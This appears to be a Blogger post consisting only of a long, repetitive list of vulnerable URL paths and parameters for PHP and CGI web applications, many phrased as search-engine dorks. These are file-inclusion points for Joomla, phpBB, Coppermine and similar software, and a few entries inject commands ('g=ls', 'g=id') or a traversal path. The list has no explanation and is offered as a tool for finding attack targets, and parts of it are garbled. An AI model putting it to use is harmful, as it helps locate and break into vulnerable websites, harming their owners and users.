cgi-bin/awstats.pl?update=1&logfile= cgi-bin/awstats/awstats.pl?configdir cgi-bin/ikonboard.cgi cgi-bin/acart/acart.pl?&page= cgi-bin/quikstore.cgi?category= cgi-bin/ubb/ubb.cgi?g= cgi-bin/hinsts.pl? cgi-bin/bp/bp-lib.pl?g= ccbill/whereami.cgi?g=ls cgi-bin/telnet.cgi cgi-bin/1/cmd.cgi calendar.pl?command=login&fromTemplate= encore/forumcgi/display.cgi?preftemp=temp&page=anonymous&file= events.cgi?t= powerup.cgi?a=latest&t= lc.cgi?a= news.cgi?a=114&t= biznews.cgi?a=33&t= jobs.cgi?a=9&t= articles.cgi?a=34&t= events.cgi?a=155&t= latinbitz.cgi?t= newsdesk.cgi?t= media.cgi?a=11&t= reporter.cgi?t= news.cgi?t= newsupdate.cgi?a=latest&t= deportes.cgi?a=latest&t= news.cgi?a=latest&t= whereami.cgi?g=id auktion.pl?menue= i-m/i-m.cgi?p= vote.pl?action=show&id= shop.pl/page= newsdesk.cgi?a=latest&t= fileseek.cgi?head=&foot= cgi-bin/probe.cgi?olddat= emsgb/easymsgb.pl?print= app/webeditor/login.cgi?username=&command=simple&do=edit&passwor d=&file= csv_db/csv_db.cgi?fil e=file.extention cgi-bin/jammail.pl?job=showoldmail&mail= cgi-bin/bbs/read.cgi?file= support_page.cgi?file_name= index.php?include= index.php?open= index.php?visualizar= main.php?x= main.php?page= index.php?meio.php= index.php?page= index.php?action= index5.php?configFile= index5.php?page= index5.php?content= index5.php?x= index5.php?open= index5.php?m= index5.php?site= index5.php?cat= index.php?d= index.php?a= index.php?b= index.php?c= index.php?e= index.php?f= index.php?g= index.php?h= index.php?i= index.php?j= index.php?k= index.php?l= index.php?m= index.php?n= index.php?o= index.php?p= index.php?q= index.php?r= index.php?s= index.php?t= index.php?u= index.php?v= index.php?x= index.php?y= index.php?z= index.php?loc= index.php?seite= index2.php?d= index2.php?a= index.php?ir= index.php?secao= index2.php?b= index2.php?c= index2.php?e= index2.php?f= index2.php?g= index2.php?h= index2.php?i= index2.php?j= index2.php?k= index2.php?l= index2.php?m= index2.php?n= index2.php?o= index2.php?p= index2.php?q= index2.php?r= index2.php?s= index2.php?t= index2.php?u= index2.php?v= index2.php?x= index2.php?y= index2.php?z= index5.php?inc= index5.php?pg= index5.php?lv1= index.php?sub= index.php?sub2= index.php?pg= index.php?lv1= index.php?directfile= index.php?funcion= index.php?ll= index.php?lnk= index5.php?main= index5.php?include= index5.php?root= index5.php?pagina= index.php?theme= index.php?acao= index5.php?cont= index5.php?pag= index5.php?p= index5.php?lang= index5.php?language= template.php?pagina= llindex.php?sub= index2.php?pg= index2.php?lv1= index2.php?sub= index2.php?directfile= index2.php?funcion= index2.php?sub2= index2.php?ll= index2.php?lnk= index5.php?bOdy= index5.php?visualizar= index5.php?do= index2.php?theme= index2.php?acao= index2hp?aa= index3hp?aa= index.php?server= index.php?cal= index.php?prefix= index.php?root_PATH= index.php?path= index.php?gorumdir= index2.php?cont= index2.php?server= index2.php?cal= index2.php?prefix= index2.php?root_PATH= index2.php?path= AKI exibir.php?abre= exibir.php?page= exibir.php?get= exibir.php?p= exibir.php?lang= index2.php?gorumdir= index2.php?pag= index2.php?lang= index2.php?language= index2.php?content= index.php?middle= step_one_tables.php?server_inc= grademade/index.php?page= phpshop/index.php?base_dir= admin.php?cal_dir= _functions.php?prefix= contacts.php?cal_dir= convert-date.php?cal_dir= album_portal.php?phpbb_root_path= mainfile.php?MAIN_PATH= index_table.php?root_dir= affich.php?base= init.php?HTTP_POST_VARS= lib.inc.php?pm_path= include.php?gorumDir= start_lobby.php?CONFIG[MWCHAT_Libs]= index.php?configFile= module_db.php?pivot_path= index.php?lng=../../include/main.inc&G_PATH= initdb.php?absolute_path= step_one.php?server_inc= pipe.php?HCL_path= write.php?dir= new-visitor.inc.php?lvc_include_dir= header.php?systempath= theme.php?THEME_DIR= index.php?pageurl= expanded.php?conf= addevent.inc.php?agendax_path= Packages.php?sourcedir= _functions.php?prefix addedit.php?root_dir= view.php?root_dir= vw_files.php?root_dir= viewgantt.php?root_dir= displayCategory.php?basepath= default/theme.php?THEME_DIR= upgrade_album.php?GERY_BASEDIR= init.inc.php?CPG_M_DIR= mod_mainmenu.php?mosConfig_absolute_path= editor.php?root= lib.php?root= secure_img_render.php?p= default.php?page= arquivo.php?data= word.php?id= mod.php?mod= index.php?plugin= sendpage.php?page= index.php?hl= modules.php?op= index.php?templateid= article.php?sid= .php?my=” .php?a=” .php?f=” .php?z=” .php?zo=” .php?la=” .php?perm=” .php?item_id=” .php?f_content=” .php?from=” .php?mid=” .php?lest=” .php?east=” .gov.br/index.php?arquivo= index.php?ver= /contenido/classes/class.inuse.php news.php?CONFIG[script_path]= index.php?vpagina= index.php?arq= index.php?pg_ID= index.php?pg= home.php?page= */newbb/print.php?forum=*topic_id=*” */newbb_plus/*=” */news/archive.php?op=*year=*month=*” .php?abrir=” .php?act=” .php?action=” .php?ad=” .php?archive=” .php?area=” .php?article=” .php?b=” */tsep/include/colorswitch.php?tsep_config[absPath]=*” .php?back=” .php?base=” .php?basedir=” .php?bbs=” .php?board_no=” .php?bOdy=” .php?c=” .php?cal_dir=” .php?cat=” /include/init.inc.php?CPG_M_DIR=” /includes/mx_functions_ch.php?phpbb_root_path=” /modules/MyGuests/signin.php?_AMGconfig[cfg_serverpath]=” .php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=” .php?subd=” .php?subdir=” .php?category=” .php?choice=” .php?class=” .php?club_id=” .php?cod.tipo=” .php?cod=” .php?conf=” .php?configFile=” .php?cont=” .php?corpo=” .php?cvsroot=” .php?d=” .php?da=” .php?date=” .php?debug=” .php?debut=” .php?default=” .php?destino=” .php?dir=” .php?display=” .php?file_id=” .php?file=” .php?filepath=” .php?flash=” .php?folder=” .php?for=” .php?form=” .php?formatword=” .php?funcao=” .php?function=” .php?g=” .php?get=” .php?go=” .php?gorumDir=” .php?goto=” .php?h=” .php?headline=” .php?i=” .php?inc=” .php?include=” .php?includedir=” .php?inter=” .php?itemid=” .php?j=” .php?join=” .php?jojo=” .php?l=” .php?lan=” .php?lang=” .php?link=” .php?load=” .php?loc=” .php?m=” .php?main=” .php?meio.php=” .php?meio=” .php?menu=” .php?menuID=” .php?mep=” .php?month=” .php?mostra=” .php?n=” .php?name=” .php?nav=” .php?new=” .php?news=” .php?next=” .php?nextpage=” .php?o=” .php?op=” .php?open=” .php?option=” .php?origem=” .php?Page_ID=” .php?pageurl=” .php?para=” .php?part=” .php?pg=” .php?pid=” .php?place=” .php?play=” .php?plugin=” .php?pm_path=” .php?pollname=” .php?post=” .php?pr=” .php?prefix=” .php?prefixo=” .php?q=” .php?redirect=” .php?ref=” .php?refid=” .php?regionId=” .php?release_id=” .php?release=” .php?return=” .php?root=” .php?S=” .php?searchcode_id=” .php?sec=” .php?secao=” .php?sect=” .php?sel=” .php?server=” .php?servico=” .php?sg=” .php?shard=” .php?show=” .php?sid=” .php?site=” .php?sourcedir=” .php?start=” .php?storyid=” .php?str=” .php?subject=” .php?sufixo=” .php?systempath=” .php?t=” .php?task=” .php?teste=” .php?theme_dir=” .php?thread_id=” .php?tid=” .php?title=” .php?to=” .php?topic_id=” .php?type=” .php?u=” .php?url=” .php?urlFrom=” .php?v=” .php?var=” .php?vi=” .php?view=” .php?visual=” .php?wPage=” .php?y=” include/new-visitor.inc.php?lvc_include_dir= includes/header.php?systempath= support/mailling/maillist/inc/initdb.php?absolute_path= coppercop/theme.php?THEME_DIR= becommunity/community/index.php?pageurl= shoutbox/expanded.php?conf= agendax/addevent.inc.php?agendax_path= myPHPCalendar/admin.php?cal_dir= yabbse/Sources/Packages.php?sourcedir= zboard/zboard.php path_of_cpcommerce/_functions.php?prefix dotproject/modules/tasks/viewgantt.php?root_dir= My_eGery/public/displayCategory.php?basepath= modules/My_eGery/public/displayCategory.php?basepath= modules/4nAlbum/public/displayCategory.php?basepath= modules/coppermine/themes/default/theme.php?THEME_DIR= modules/agendax/addevent.inc.php?agendax_path= modules/xoopsgery/upgrade_album.php?GERY_BASEDIR= modules/xgery/upgrade_album.php?GERY_BASEDIR= modules/coppermine/include/init.inc.php?CPG_M_DIR= modules/mod_mainmenu.php?mosConfig_absolute_path= pivot/modules/module_db.php?pivot_path= library/editor/editor.php?root= library/lib.php?root= e107/e107_handlers/secure_img_render.php?p= main.php?x= main.php?page= *default.php?page= *default.php?bOdy= default.php?page= *index.php?url= *index.php?arquivo= index.php?meio.php= index.php?include= index.php?open= index.php?visualizar= index.php?pagina= index.php?inc= index.php?page= index.php?pag= index.php?p= index.php?content= index.php?cont= index.php?c= index.php?meio= index.php?x= index.php?cat= index.php?site= index.php?configFile= index.php?action= index.php?do= index2.php?x= Index.php?id= index2.php?content= template.php?pagina inc/step_one_tables.php?server_inc= phpshop/index.php?base_dir= admin.php?cal_dir= path_of_cpcommerce/_functions.php?prefix= contacts.php?cal_dir= convert-date.php?cal_dir= album_portal.php?phpbb_root_path= mainfile.php?MAIN_PATH= dotproject/modules/files/index_table.php?root_dir= html/affich.php?base= gery/init.php?HTTP_POST_VARS= pm/lib.inc.php?pm_path= ideabox/include.php?gorumDir= modules/tasks/viewgantt.php?root_dir= cgi-bin/index.cgi?page= cgi-bin/awstats.pl?update=1&logfile= cgi-bin/awstats/awstats.pl?configdir cgi-bin/ikonboard.cgi cgi-bin/acart/acart.pl?&page= cgi-bin/quikstore.cgi?category= cgi-bin/ubb/ubb.cgi?g= cgi-bin/hinsts.pl? cgi-bin/bp/bp-lib.pl?g= ccbill/whereami.cgi?g=ls cgi-bin/telnet.cgi cgi-bin/1/cmd.cgi encore/forumcgi/display.cgi?preftemp=temp&page=anonymous&file= cgi-sys/guestbook.cgi?user=cpanel&template= account.php?action= account.php?action= account.php?action= iurl:”account.php?action=” account.php?action= iurl:”.php?action=” account.php?action= .php?action= accounts.php?command= .php?command=” addmedia.php?factsfile[$LANGUAGE]= phpGedView .php?p=” announcements.php?phpraid_dir= “phpraid” announcements.php?phpraid_dir= “phpraid signup” announcements.php?phpraid_dir= php raid announcements.php?phpraid_dir= phpraid announcements.php?phpraid_dir= phpraid signup arg.php?arg= .php?arg= args.php?arg= .php?arg= atom.php5?page= .php5?id= auto.php?inc= .php?inc=” auto.php?page= auto.php?page= base.php?f1= base.php?f1=” base.php?f1= .php?f1=” board.php?see= board.php?see=” board.php?see= .php?see=” book.php5?page= php5?page= /calendar.php?l= calendar.php?l=” /calendar.php?l= calendar.php?l= /calendar.php?p= calendar.php?p=” /calendar.php?p= calendar.php?p= /calendar.php?pg= calendar.php?pg=” /calendar.php?pg= calendar.php?pg= /calendar.php?s= calendar.php?s=” /calendar.php?s= calendar.php?s=
Diposting oleh Tidak ada komentar:
Langganan: Postingan (Atom)